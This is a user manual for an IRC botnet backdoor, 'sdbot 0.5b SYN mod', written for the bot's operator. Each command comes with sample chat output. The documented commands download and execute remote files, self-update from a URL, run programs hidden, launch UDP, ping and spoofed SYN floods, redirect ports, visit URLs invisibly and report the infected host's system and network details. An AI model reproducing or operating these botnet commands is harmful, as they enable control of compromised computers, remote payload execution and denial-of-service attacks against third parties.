command reference
(for sdbot 0.5b SYN mod)

general / clones & spies / downloading / flood / redirect / system info / visit

command alias syntax description example
general commands      
about ab about causes the bot to blatently advertise itself.

<Faust> .about
<sdbot> sdbot version 0.5b by [sd]/

action a action
<channel/user> <text>
causes the bot to perform the specified action (kind of like / me) to the specified channel or user. <[sd]> .action #idlechat explodes.
* sdbot explodes.
addalias aa addalias <alias name> <command> temporarily adds an alias to the bot's alias list. you can use any of the following variables in your alias: $me (bot's nick), $chan (current channel), $user (user executing the command),  $rndnick (4-7 character random string), $1 through $16 (1st parameter through 16th), $1- through $15- (first parameter and everything after it, etc.) <Faust> .addalias hello privmsg $chan hello
<Faust> .hello
<sdbot> hello
<[sd]> .addalias smackme action $chan smacks $user $1-
<[sd]> .smackme 2 times
* sdbot smacks [sd] 2 times.
aliases al aliases causes the bot to reply with it's current alias list. <Faust> .aliases
<sdbot> -[alias list]-
<sdbot> 0. opme = mode $chan +o $user
<sdbot> 1. smack = action $chan smacks $1
<sdbot> 2. u1 = udp $1 10000 2048 50
<sdbot> 3. u2 = udp $1 10000 $2 50
<sdbot> 4. halfop = mode $chan +h $1
cycle cy cycle <seconds> <channel> causes the bot to leave the specified channel, then come back after the number of seconds specified. <[sd]> .cycle 5 #idlechat
* sdbot has left the channel.
 [5 seconds later...]
* sdbot has joined the channel.
delay de delay <seconds> <command> causes the bot to execute the specified command after the specified number of seconds. <[sd]> .delay 10 .quit
 [10 seconds later...]
* sdbot has quit (later).
die d die causes the bot to immediately close on the host's computer. this will also kill all threads, so be careful. try to use 'quit' if possible instead of die, because die performs no cleanup. <[sd]> .die
* sdbot has quit (connection reset by peer).
disconnect dc disconnect causes the bot to disconnect from the server, but stay running, then reconnect 30 mins later. no threads are killed. <[sd]> .disconnect
* sdbot has quit (later.).
dns dn dns causes the bot to resolve a hostname or ip address. <[sd]> .dns
execute e execute <visibility> <file> [parameters] causes the bot to run a program. visibility should be 0 or 1, being hidden or visible respectively. <Faust> .execute 1 notepad.exe
[notepad runs visibly]
id i id causes the bot to reply with its id. <[sd]> .id
<sdbot> sdbot1
join j join <channel> [key] causes the bot to join the specified channel on the current server (using the key(password), if specified. <[sd]> .join #idlechat
 [in #idlechat...]
* sdbot has joined the channel.
killthread k killthread <thread #> [thread #] [...] causes the bot to kill the specified thread(s) (this command will not work on thread 0, use 'die' instead). <[sd]> .killthread 4
<sdbot> thread(s) killed.
<[sd]> .killthread 2 3
<sdbot> thread(s) killed.
log lg log causes the bot to reply with a log of connections and logins, along with dates and times. <[sd]> .log
<sdbot> [Sat Sep 22 11:58:12 2001] user [sd]( logged in.
<sdbot> [Sat Sep 22 11:57:54 2001] connected to
<sdbot> [Sat Sep 22 11:57:53 2001] bot started.
login l login <password> logs
you into the bot if the specified password is correct. once you log in,
you must log out with the 'logout' command if you want someone else to log
in (unless you have multiple logins enabled). if you are kicked or part from the channel, or quit you
are automatically logged out.
<[sd]> .login hehe
<sdbot> password accepted.
logout lo logout manually logs you out of the bot. <[sd]> .logout
<sdbot> user [sd] logged out.
mode m mode [channel] <mode> [user] causes the bot to set a channel or user mode (works like the /mode command). <[sd]> .mode #sdbot +o [sd]
 [in #sdbot...]
* sdbot sets mode +o [sd].
nick n nick <new nick> causes the bot to change its nick to the one specified. <[sd]> .nick sdbot2
* sdbot is now known as sdbot2.
open o open <file> caueses the bot to open a file. unlike execute, this command will open any kind of file, not just programs. you can also use this to open a web page in the computer's default browser. <[sd]> .open c:\windows\clouds.bmp
<sdbot> file opened.
part pt part <channel> causes the bot to part the specified channel on the current server <[sd]> .part #sdbot
 [in #sdbot...]
* sdbot has left the channel.
prefix pf prefix <prefix> temporarily changes the bot's command prefix. the prefix will be reset the next time the bot is run.

<Faust> .prefix !
<Faust> !s
<sdbot> sdbot 0.4b ready. Up 0d 1h 31m.

privmsg pm privmsg <nick/channel> <message> causes the bot to message the user/channel
with the specified text.

<Faust> .privmsg Faust hello
[in private query]
<sdbot> hello

<[sd]> .privmsg #sdbot hello
[in #sdbot]
<sdbot> hello

quit q quit [message] causes the bot to quit the current server (with the specified message, if any). this command will also close the bot and kill all threads, so be careful. <[sd]> .quit
* sdbot has quit (goodbye.).
raw r raw <text> causes the bot to send the specified text to the server. <[sd]> .raw QUIT :later!
* sdbot has quit (later!)
reconnect r reconnect causes the bot to disconnect from the current server, then reconnect. the bot will receive a new nick and ident. <[sd]> .reconnect
* sdbot has quit (connection reset by peer).
* kdsfa has joined the channel.
remove rm remove causes the bot to totally remove itself from the host computer (including autostart). <Faust> .remove
<sdbot> removing bot...
* sdbot has quit (Connection reset by peer)
repeat rp repeat <# of times> <command> causes the bot to act as if it had received the specified command from you the number of times given. <[sd]> .repeat 3 .privmsg #sdbot hehe
<sdbot> hehe
<sdbot> hehe
<sdbot> hehe
rndnick rn rndnick causes
the bot to change to a random nick.
<[sd]> .rndnick
* sdbot is now known as dhjds.
server se server temporarily changes the server that the bot connects to. <[sd]> .server
<[sd]> .reconnect
[bot connects to]
status s status causes the bot to echo back its version number, and how long the bot has been running. <[sd]> .status
<sdbot> sdbot 0.4c ready. Up 0d 4h 31m.
threads t threads causes the bot to reply with a list of running threads. threads will keep their original number, even if other threads close or are killed. <[sd]> .threads
<sdbot> -[thread list]-
<sdbot> 0. main thread
<sdbot> 1. udp (
<sdbot> 2. redirect (12345- >
<sdbot> 3. spy (
c_action c_a c_action <thread #> <channel/user> <text> causes the clone/spy with the specified thread number to perform an action (like /me) to the specified channel or user. <[sd]> .c_action 2 explodes.
* clone explodes.
c_join c_j c_join <thread #> <channel> [key] causes the clone/spy with the specified thread number to join a channel. <[sd]> .c_join 3 #idlechat
 [in #idlechat...]
* clone2 has joined the channel.
c_mode c_m c_mode <thread #> [channel] <mode> [user] causes the clone/spy with the specified thread number to set a channel or user mode (works like the /mode command). <[sd]> .c_mode 2 #sdbot +o [sd]
 [in #sdbot...]
* clone sets mode +o [sd].
c_nick c_n c_nick <thread #> <nick> causes the clone/spy with the specified thread number to change its nick. <[sd]> .c_nick 2 clone3
* clone is now know as clone3.
c_part c_p c_join <thread #> <channel> causes the clone/spy with the specified thread number to part a channel. <[sd]> .c_part 3 #idlechat
 [in #idlechat...]
* clone2 has left the channel.
c_pm c_privmsg
<thread #> <channel/user> <text>
causes the clone/spy with the specified thread number to message the user/channel with the specified text. <[sd]> .c_privmsg 2 #sdbot hey!
 [in #sdbot...]
<clone> hey!
c_quit c_q c_quit <thread #> causes the clone/spy with the specified thread number to quit its irc server. <[sd]> .c_quit 2
* clone has quit (later.).
c_raw c_r c_raw <thread #> <text> causes the clone/spy with the specified thread number to send the specified text
to the server.
<[sd]> .c_raw 2 QUIT :later!
* clone2 has quit (later!)
c_rndnick c_rn c_rndnick <thread #> causes the clone/spy with the specified thread number to change to a random nickname. <[sd]> .c_rndnick 3
* clone2 is now known as sagklj.
clone c clone <server> <port> <channel> causes the bot to create a clone on the specified server, on the specified port
in the specified channel.
<[sd]> .clone 6667 #sdbot
<sdbot> clone created on in channel #sdbot
spy sp spy <nick> <server> <port> <channel> creates a spy with the specified nick on the specified server/port, in the
specified channel.
<[sd]> .spy spy1 6667 #sdbot
<sdbot> spy created on, in channel #sdbot.
<sdbot> [#sdbot]: spy1 has joined #sdbot.
download dl download <url> <destination> <action> causes the bot to download the file specified by url to the file specified by
destination. if action is 1, then the file is also executed, otherwise it is only saved.
<[sd]> .download http:// c:\windows\devldr32.exe 1
<sdbot> downloading http://
<sdbot> downloaded 79.3 kb to c:\windows\devldr32.exe @ 5.5 kb/sec.
<sdbot> executed c:\windows\devldr32.exe.
update up update <url> <id> causes the bot to download the file specified by url, and replace the current sdbot executable with the new one if the bot id specified by id is different than the bot's id. <[sd]> .update http:// sdbot2
<sdbot> downloading update from sdbot.exe...
<sdbot> downloaded 9.2 kb to c:\sdbot.exe @ 9.2 kb/sec. updating...
udp u udp <host> <# of packets> <packet size> <delay> [port] causes the bot to send the specified number of udp packets of the specified size to the host, with the number of milliseconds specified by delay between packets. if port is specified, it sends the udp packets to that port. otherwise, it uses a random port. <[sd]> .udp 1000 4096 100
<sdbot> sending 1000 udp packets to: packet size: 4096, delay: 100[ms].
ping p ping <host> <# of pings> <packet size> <timeout> causes the bot to send the specified number of pings to the host, and wait the number of milliseconds specified by timeout for packets to return before sending the next set. <[sd]> .ping 1000 4096 100
<sdbot> sending 1000 pings to packet size: 4096, timeout: 100[ms]
syn   syn <target IP> <target port> <length in seconds> causes the bot to send SYN packets to the specified IP address on the specified port for the requested number of seconds. Doesn't work on Win95 or 98 and requires Administrator rights on 2k and NT. XP works fine. Attempts to spoof the IP to be in the target's class C. <Tesla> .syn 80 10
<sdbot> SYN flooding [] for 10 seconds
<sdbot> Done with SYN flood [198KB/sec]
redirect rd redirect <local port> <remote host> <remote port> causes the bot to start a basic port redirect. everything sent to the port
specified by local port will be redirected to the remote host and port specified.
<[sd]> .redirect 12345 6667
<sdbot> redirect created on port 12345 to
system info      
sysinfo si sysinfo causes the bot to reply with information on the host system, including processor speed, total/free ram, operating system version, uptime, and currently logged-in user. <[sd]> .sysinfo
<sdbot> cpu: 1400MHz. ram: 523744KB total, 376108KB free. os: Windows XP (5.1, build 2600). uptime: 4d 3h 11m. Current user: Administrator
netinfo ni netinfo causes the bot to reply with information on the bot's network connection, including connection type/name, local IP address, and host used to connect the the irc server. <[sd]> .netinfo
<sdbot> connection type: dial-up (MSN). IP Address: connected from:
visit v visit <url> [referer] causes the bot to invisibly visit the specified url. the bot will act like it was sent from the url in 'referer' (if specified). <[sd]> .visit
<sdbot> site visited.
1. a command and its alias do the same thing, the alias is just a shortened version for lazy people.
 2. spies do not respond to commands, but clones do; most commands given directly to a clone will affect only that clone and not the original bot.
 3. if you put the bot's nick before a command, only that bot will execute the command (eg, 'sdbot: .si')
 4. if you use the '-s' parameter at the end of a command, the bot will not reply when the command is executed. this will not work with commands whose only function is to say something, however. for example, if you give the bot the command: '.login bleh -s' the bot will not reply with 'password accepted'.
 5. if topic commands are enabled, then setting the topic to a command will cause the bot to execute that command when it joins the channel.
 6. variables (except parameter variables, like $1 and $1-) can be used in normal commands if you use a double prefix, like: '..privmsg $chan hey'.
 7. if you use the '-n' parameter at the end of a command, the bot will send its reply as a notice instead of a privmsg.
 8. if you specify both '-s' and '-n', only the last parameter given will take effect.